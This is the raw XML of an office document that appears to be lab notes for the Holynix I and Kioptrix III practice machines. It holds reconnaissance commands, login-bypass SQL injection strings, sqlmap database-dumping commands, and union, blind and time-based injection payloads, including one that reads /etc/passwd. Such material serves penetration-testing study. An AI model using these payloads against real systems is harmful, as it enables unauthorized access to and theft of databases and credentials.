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26"/>
        <w:gridCol w:w="1923"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9349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32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Holynix I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="143" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7426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Attacker (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923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Victim</w:t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 ifconfig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netdiscover –r [Target Network]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nmap –sS –sV –O ip_address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nikto –host ip_address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http://ip_address/ (Browser)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  <w:b/>
              </w:rPr>
              <w:t>Bypassing Login Screens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admin' --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admin' #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admin'/*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' or 1=1--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' or 1=1#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' or 1=1/*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') or '1'='1--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') or ('1'='1--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admin’ or 1=1–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 xml:space="preserve">‘ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>or ’1′=’1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 xml:space="preserve">‘ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>or 1=1–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 xml:space="preserve">” </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>or 1=1–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or 1=1–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 xml:space="preserve">‘ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>or ’1′=’1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 xml:space="preserve">” </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>or “1″=”1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‘</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>) or (’1′=’1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1 or ‘1=1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jc w:val="both"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>…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  <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:lang w:val="en-GB"/>
              </w:rPr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sqlmap.py -u "http://ip_address/index.php?page=login.php" --data "user_name=a&amp;password=z&amp;Submit_button=Submit" --dbs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sqlmap.py -u "http://ip_address/index.php?page=login.php" --data "user_name=a&amp;password=z&amp;Submit_button=Submit" --current-db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sqlmap.py -u "http://ip_address/index.php?page=login.php" --data "user_name=a&amp;password=z&amp;Submit_button=Submit" –D clients --tables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sqlmap.py -u "http://ip_address/index.php?page=login.php" --data "user_name=a&amp;password=z&amp;Submit_button=Submit" –D clients -T accounts --columns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sqlmap.py -u "http://ip_address/index.php?page=login.php" --data "user_name=a&amp;password=z&amp;Submit_button=Submit" –D clients -T accounts –C thanks --dump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sqlmap.py -u "http://ip_address/index.php?page=login.php" --data "user_name=a&amp;password=z&amp;Submit_button=Submit" –D clients -T accounts --dump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sqlmap.py --url "http://ip_address/?page=login.php" --forms --dump-all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9349" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders/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32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>Kioptrix III</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7426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Attacker (Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1923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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Victim</w:t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vi /etc/hosts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  <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Ip_address Kioptrix3.com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cat /etc/hosts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http://kioptrix3.com (Browser)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http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=photoid#photos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(insert a big integer, insert a big string, insert a alphanumeric (new122334), insert single quote (‘), insert 1’, insert \’, insert \’), insert double quote (“), insert 1”, insert \”, insert \”), insert \)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http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=filename#photos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# sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=filename#photos" --dbs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sqlmap.py -u "</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ListLabel5"/>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:instrText> HYPERLINK "http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=filename" \l "photos" \n External link to http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=filename#photos</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ListLabel5"/>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ListLabel5"/>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:t>http://kioptrix3.com/gallery/gallery.php?id=1&amp;sort=filename#photos</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ListLabel5"/>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:t>" --dbms=</w:t>
            </w:r>
            <w:hyperlink r:id="rId2" w:tgtFrame="The tiddler 'MySQL' doesn't yet exist">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="ListLabel5"/>
                  <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                </w:rPr>
                <w:t>MySQL</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:t> -D gallery –tables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./sqlmap.py - -url "</w:t>
            </w:r>
            <w:hyperlink r:id="rId3" w:tgtFrame="External link to http://192.168.1.155/?page=login.php">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="ListLabel5"/>
                  <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                </w:rPr>
                <w:t>http://192.168.1.155/?page=login.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:t>" --forms --dump-all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ourier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
              </w:rPr>
              <w:t>………</w:t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  <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7426" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="auto" w:val="clear"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=1 order by 1--,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=1 order by 2--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=1 order by 3--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=1 order by 4--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=1 order by 5--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=1 order by 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1,database(),3,4,5,6--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1,2,schema(),4,5,6--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1,user(),3,4,5,6--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1,system_user(),3,4,5,6--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1,session_user(),3,4,5,6--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1,version(),3,4,5,6--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 sleep(2),3,4,5,6--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database()),4,5,6--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load_file('../../../../etc/passwd')),4,5,6--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table_name from information_schema.tables where table_schema=database() limit 0,1),4,5,6--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table_name from information_schema.tables where table_schema=database() limit 1,1),4,5,6--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table_name from information_schema.tables where table_schema=database() limit 2,1),4,5,6--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group_concat((select (database())))),4,5,6--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group_concat(CHAR(58),(select (database())),CHAR(58))),4,5,6--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concat((select (database())))),4,5,6--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concat(CHAR(58),(select (database())),CHAR(58))),4,5,6--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concat_ws(',','CHAR(58),(select (database())),CHAR(58))),4,5,6--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concat_ws(':','CHAR(58),(select (database())),CHAR(58))),4,5,6--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concat_ws('[','CHAR(58),(select (database())),CHAR(58))),4,5,6--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group_concat(user(),CHAR(58),(select (database())),CHAR(58))),4,5,6--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union select 1,2,(select group_concat((select user()),CHAR(58),(select (database())),CHAR(58))),4,5,6--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union select 1,2,(select group_concat((select (user())),CHAR(58),(select (database())),CHAR(58))),4,5,6--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List Databases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group_concat(CHAR(58),CHAR(58),(select group_concat(table_schema) from information_schema.tables),CHAR(58),CHAR(58))),4,5,6--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group_concat(CHAR(58),CHAR(58),(select group_concat(DISTINCT table_schema) from information_schema.tables),CHAR(58),CHAR(58))),4,5,6--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List Tables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group_concat(CHAR(58),CHAR(58),(select group_concat(table_schema, table_name) from information_schema.tables),CHAR(58),CHAR(58))),4,5,6--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group_concat(CHAR(58),CHAR(58),(select group_concat(table_schema,CHAR(32), table_name) from information_schema.tables),CHAR(58),CHAR(58))),4,5,6--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group_concat(CHAR(58),CHAR(58),(select group_concat(DISTINCT table_schema,CHAR(32), table_name,CHAR(58),CHAR(58)) from information_schema.tables),CHAR(58),CHAR(58))),4,5,6--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group_concat(CHAR(58),CHAR(58),(select group_concat(DISTINCT table_schema,CHAR(32), table_name,CHAR(58),CHAR(58)) from information_schema.tables where table_schema!='information_schema'),CHAR(58),CHAR(58))),4,5,6--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List Columns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group_concat(CHAR(58),CHAR(58),(select group_concat(DISTINCT table_schema,CHAR(32), table_name,CHAR(58), column_name,CHAR(58)) from information_schema.columns),CHAR(58),CHAR(58))),4,5,6--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group_concat(CHAR(58),CHAR(58),(select group_concat(DISTINCT table_schema,CHAR(32), table_name,CHAR(58), column_name,CHAR(58)) from information_schema.columns where table_schema!='information_schema'),CHAR(58),CHAR(58))),4,5,6--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1=1--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1=0--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database()='gallery'--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version() like '5%'--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length(database())=6--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length(database())=7--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length(database())=8--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substr(database(),1,1)='g'--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substr(database(),2,1)='a'--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substr(database(),3,1)='l'--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substr(database(),1,2)='ga'--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substr(database(),1,3)='gal'--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ascii(substr(database(),1,1))&gt;34--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ascii(substr(database(),1,1))&lt;126--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ascii(substr(database(),1,1))=103--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(select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='g'--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(select substr(table_name,2,1) from information_schema.tables where table_schema=database() limit 0,1)='a'--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(select substr(table_name,1,2) from information_schema.tables where table_schema=database() limit 0,1)='ga'--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(select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)&gt;34--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(select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)&lt;126--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(select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema=database() limit 0,1)=103--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sleep(2)--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(select sleep(2))--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1,2,(select sleep(2)),4,5,6--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(select if((select database())="gallery", sleep(3), null))--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1,2,if((select database())="gallery", sleep(3), null),4,5,6--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(select if((select version() like '5%'), sleep(3), null))--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1,2,if((select version() like '5%'), sleep(3), null),4,5,6--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1,2,if((ascii(substr(database(),1,1))&gt;34), sleep(3), null),4,5,6--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1,2,if((ascii(substr(database(),1,1))&lt;126), sleep(3), null),4,5,6--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union select 1,2,if((ascii(substr(database(),1,1))=103), sleep(3), null),4,5,6--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(select if((ascii(substr(database(),1,1))&gt;34), sleep(3), null))--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(select if((ascii(substr(database(),1,1))&lt;126), sleep(3), null))--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  <w:t>1 or (select if((ascii(substr(database(),1,1))=103), sleep(3), null))--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Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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urier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New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Char" w:customStyle="1">
    <w:name w:val="Προ-διαμορφωμένο HTML Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="-HTML"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00de3dd4"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"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065080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7c143d"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Highlight" w:customStyle="1">
    <w:name w:val="highlight"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="003e5e8f"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Appleconvertedspace" w:customStyle="1">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="003e5e8f"/>
    <w:rPr/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-HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00de3dd4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NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="000650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l-GR"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55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;" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.155/?page=login.php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Trio_Office/6.2.8.2$Windows_x86 LibreOffice_project/</Application>
  <Pages>5</Pages>
  <Words>678</Words>
  <Characters>6746</Characters>
  <CharactersWithSpaces>7267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2021-02-03T08:54:00Z</dcterms:created>
  <dc:creator>paps</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-10T17:45:26Z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